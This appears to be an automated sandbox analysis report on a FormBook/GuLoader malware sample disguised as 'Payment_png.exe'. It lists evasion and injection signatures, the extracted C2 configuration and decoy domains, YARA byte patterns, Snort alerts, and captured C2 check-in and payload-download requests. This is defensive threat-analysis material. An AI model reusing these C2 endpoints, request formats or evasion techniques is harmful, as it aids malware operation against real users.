Loading ...

Play interactive tourEdit tour

Analysis Report Payment_png.exe

Overview

General Information

Sample Name:Payment_png.exe
Analysis ID:377352
MD5:86fa26e33879d3c04152301eaaaba518
SHA1:3c75755b8efe897bb18ea99f6014dabd5492d32c
SHA256:eacf1b7b8d612e5a500f79a03b06f9fb919768a1fb053ce3522f3288c36067f4
Tags:GuLoader
Infos:

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Payment_png.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\Payment_png.exe' MD5: 86FA26E33879D3C04152301EAAABA518)
    • Payment_png.exe (PID: 3112 cmdline: 'C:\Users\user\Desktop\Payment_png.exe' MD5: 86FA26E33879D3C04152301EAAABA518)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 2988 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\Payment_png.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.booksfall.com/c8bs/"], "decoy": ["dreamwrldrp.com", "epkshu.com", "accinf5.com", "karadenizturk.com", "pcpartout.com", "kuwoopi.com", "gtaqcf.com", "lambofgodprinting.com", "vinelytv.com", "domennyarendi39.net", "broskiusa.com", "bombiepalaboy.com", "plowbrothers.com", "domentemenegi42.net", "jfhousebuyers.com", "birkenhof-allgaeu.net", "quantify-co.com", "bitoko.net", "choupisson.com", "bostonm.info", "wojkowski.com", "themersy.com", "structuredmen.net", "jadaccaentertainment.com", "strategyplace.net", "kadyshopping.com", "bookhangovers.com", "peopleskillschallenge.com", "sturestaypluspdx.com", "nxywsy.com", "citestaccnt1598622913.com", "bestmodestorestaurants.com", "thebabyfriendly.com", "aainakari.com", "cookklip.com", "8bitupgrades.com", "smartintegrityplatform.com", "silverdollarcafe.com", "obleaslaoriginal.com", "csfeliz.com", "selfmadepartners.com", "djmacktruck.com", "madefaz.net", "55zhidian.com", "slutefuter.com", "enternet360.com", "autoandtruckpartsincoh.com", "loversdeal.com", "windorians.com", "skinsbag.com", "indounace-maisounce.com", "atxrealestateforsale.com", "lotdco.com", "littlewanda.com", "epc-scot.com", "thesaltybookkeeper.com", "neebcoteam.com", "uforservice.com", "cashcanbeyours.com", "bondar.design", "rwpgoyiof.club", "mindfulreadings.com", "dhadaka.com", "aartihand.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.booksfall.com/c8bs/"], "decoy": ["dreamwrldrp.com", "epkshu.com", "accinf5.com", "karadenizturk.com", "pcpartout.com", "kuwoopi.com", "gtaqcf.com", "lambofgodprinting.com", "vinelytv.com", "domennyarendi39.net", "broskiusa.com", "bombiepalaboy.com", "plowbrothers.com", "domentemenegi42.net", "jfhousebuyers.com", "birkenhof-allgaeu.net", "quantify-co.com", "bitoko.net", "choupisson.com", "bostonm.info", "wojkowski.com", "themersy.com", "structuredmen.net", "jadaccaentertainment.com", "strategyplace.net", "kadyshopping.com", "bookhangovers.com", "peopleskillschallenge.com", "sturestaypluspdx.com", "nxywsy.com", "citestaccnt1598622913.com", "bestmodestorestaurants.com", "thebabyfriendly.com", "aainakari.com", "cookklip.com", "8bitupgrades.com", "smartintegrityplatform.com", "silverdollarcafe.com", "obleaslaoriginal.com", "csfeliz.com", "selfmadepartners.com", "djmacktruck.com", "madefaz.net", "55zhidian.com", "slutefuter.com", "enternet360.com", "autoandtruckpartsincoh.com", "loversdeal.com", "windorians.com", "skinsbag.com", "indounace-maisounce.com", "atxrealestateforsale.com", "lotdco.com", "littlewanda.com", "epc-scot.com", "thesaltybookkeeper.com", "neebcoteam.com", "uforservice.com", "cashcanbeyours.com", "bondar.design", "rwpgoyiof.club", "mindfulreadings.com", "dhadaka.com", "aartihand.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Payment_png.exeVirustotal: Detection: 70%Perma Link
      Source: Payment_png.exeMetadefender: Detection: 19%Perma Link
      Source: Payment_png.exeReversingLabs: Detection: 79%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000E.00000002.470480865.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.468761145.0000000000950000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.313967074.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.305977601.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000E.00000002.470603581.0000000002FD0000.00000004.00000001.sdmp, type: MEMORY
      Source: 14.2.colorcpl.exe.30327b8.2.unpackAvira: Label: TR/Dropper.Gen
      Source: 14.2.colorcpl.exe.5117960.5.unpackAvira: Label: TR/Dropper.Gen
      Source: Payment_png.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 170.249.199.106:443 -> 192.168.2.3:49714 version: TLS 1.2
      Source: Binary string: colorcpl.pdbGCTL source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: colorcpl.pdb source: Payment_png.exe, 00000002.00000002.305994163.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: Payment_png.exe, 00000002.00000002.314083884.000000001E380000.00000040.00000001.sdmp, colorcpl.exe, 0000000E.00000002.471234758.0000000004BE0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Payment_png.exe, colorcpl.exe
      Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000006.00000000.294257037.000000000F785000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.294003338.000000000E350000.00000002.00000001.sdmp

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 34.102.136.180:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49736 -> 172.67.184.37:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 35.246.6.109:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 217.160.0.233:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49742 -> 23.227.38.32:80
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.booksfall.com/c8bs/
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.plowbrothers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.loversdeal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.pcpartout.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.birkenhof-allgaeu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.choupisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.uforservice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.silverdollarcafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewIP Address: 198.54.117.218 198.54.117.218
      Source: Joe Sandbox ViewIP Address: 23.227.38.32 23.227.38.32
      Source: Joe Sandbox ViewIP Address: 23.227.38.32 23.227.38.32
      Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
      Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aps-mm.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.aps-mm.comConnection: Keep-Alive
      Source: C:\Windows\explorer.exeCode function: 6_2_0613D302 getaddrinfo,setsockopt,recv,
      Source: global trafficHTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: aps-mm.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /bin_BNUtTDfY243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.aps-mm.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.plowbrothers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.loversdeal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.pcpartout.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.birkenhof-allgaeu.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.choupisson.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.uforservice.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1Host: www.silverdollarcafe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: aps-mm.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 29 Mar 2021 11:59:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: Payment_png.exe, 00000002.00000002.306035151.0000000000561000.00000040.00000001.sdmpString found in binary or memory: http://aps-mm.com/bin_BNUtTDfY243.bin
      Source: explorer.exe, 00000006.00000000.294226634.000000000F740000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.aainakari.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.aainakari.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.aainakari.com/c8bs/www.bostonm.info
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.aainakari.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.accinf5.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.accinf5.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.accinf5.com/c8bs/www.silverdollarcafe.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.accinf5.comReferer:
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.birkenhof-allgaeu.net
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.birkenhof-allgaeu.net/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.birkenhof-allgaeu.net/c8bs/www.choupisson.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.birkenhof-allgaeu.netReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.booksfall.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.booksfall.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.booksfall.com/c8bs/www.pcpartout.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.booksfall.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.bostonm.info
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.bostonm.info/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.bostonm.info/c8bs/www.quantify-co.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.bostonm.infoReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.broskiusa.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.broskiusa.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.broskiusa.com/c8bs/www.aainakari.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.broskiusa.comReferer:
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.choupisson.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.choupisson.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.choupisson.com/c8bs/www.uforservice.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.choupisson.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domennyarendi39.net
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domennyarendi39.net/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domennyarendi39.net/c8bs/www.accinf5.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domennyarendi39.netReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domentemenegi42.net
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domentemenegi42.net/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domentemenegi42.net/c8bs/www.broskiusa.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.domentemenegi42.netReferer:
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000006.00000000.290712760.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.loversdeal.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.loversdeal.com/c8bs/
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.loversdeal.com/c8bs/www.booksfall.com
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.loversdeal.comReferer:
      Source: explorer.exe, 00000006.00000002.481389502.0000000005603000.00000004.00000001.sdmpString found in binary or memory: http://www.pcpartout.com
